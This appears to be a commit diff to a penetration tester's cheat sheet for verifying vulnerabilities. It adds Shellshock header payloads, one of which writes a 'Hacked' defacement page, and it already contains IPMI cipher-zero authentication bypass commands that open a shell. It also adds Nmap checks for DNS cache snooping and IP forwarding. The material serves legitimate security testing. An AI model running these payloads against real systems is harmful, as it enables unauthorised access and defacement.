Updates

Arrowzzzzzz · Oct 9, 2014 · e364684 · e364684
1 parent 368af3c
commit e364684
Showing 1 changed file with 30 additions and 1 deletion.
diff --git a/Cheatsheet_VulnVerify.txt b/Cheatsheet_VulnVerify.txt
@@ -1,4 +1,4 @@
-Verify various vulnerabilities
+Verify Various Vulnerabilities
 ------------------------------
 
 [+] IPMI Cipher Suite Zero Authentication Bypass:
@@ -16,3 +16,32 @@ ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
 ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+
+
+[+] Bash Remote Code Execution (Shellshock)
+http://www.tenable.com/plugins/index.php?view=single&id=77823
+
+x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
+x: () { :;}; echo "Hacked" > /var/www/hacked.html
+
+
+[+] DNS Server Cache Snooping Remote Information Disclosure
+http://www.tenable.com/plugins/index.php?view=single&id=12217
+
+Nmap Script: dns-cache-snoop
+http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
+
+nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>
+
+
+[+] IP Forwarding Enabled
+http://www.tenable.com/plugins/index.php?view=single&id=50686
+
+Nmap Script: ip-forwarding
+http://nmap.org/nsedoc/scripts/ip-forwarding.html
+
+sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
+
+Alternatives:
+- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
+- http://pentestmonkey.net/tools/gateway-finder